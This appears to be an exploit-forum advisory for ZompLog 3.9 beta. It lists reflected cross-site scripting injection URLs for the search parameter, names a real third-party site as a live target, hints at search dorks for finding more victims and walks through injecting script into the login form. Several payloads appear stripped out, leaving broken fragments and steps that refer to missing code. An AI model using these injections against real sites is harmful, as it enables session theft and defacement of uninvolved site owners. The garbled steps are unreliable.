############################################################################# # Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 -C1c4Tr1Z - Gabitzu # # and all darkc0de members # ;############################################################################ # # Author: swappie [aka] faithlove # Email : swappieakafaithlove@gmail.com # # Do researching and share! # ;############################################################### # # Title: ZompLog 3.9 beta # # CMS Link: http://www.zomp.nl/user-content/downloads/zomplog/zomplog3.9-beta.zip # # Vendor: http://www.zomp.nl/ # # ;############################################################################ # # # Dork: I'm sure you can figure this out alone, right? # # # ############################################################################# http://www.site.com/index.php?search=>"> http://www.site.com/index.php?search=%00'"> http://www.site.com/index.php?search=>"> Live Demo: http://www.irishesseling.nl/index.php?search=>"> -----------------------------------------------------------------; *) Another Vulnerability regards the www.site.com/login.php Method 1. =========== We can edit the html source code generated by the login.php and edit the following line: [===] MAKE IT LOOK LIKE THIS: " maxlength="15" id="log" /> Method 2. =========== Step 1. Write in Login section: >"> Step 2. (Hit Enter) or click the Login Button. you'll see in Login something looking like this: >\ Step 3. Delete the ">\" part and insert the following code in it: Step 4. (Hit Enter) or click the Login Button. Result: You should see a small window with the "XSS Vuln" text in it. [!!!] This "login.php part" worked just with a fresh install of the CMS as i have installed it locally. Cheers, swappie [aka] faithlove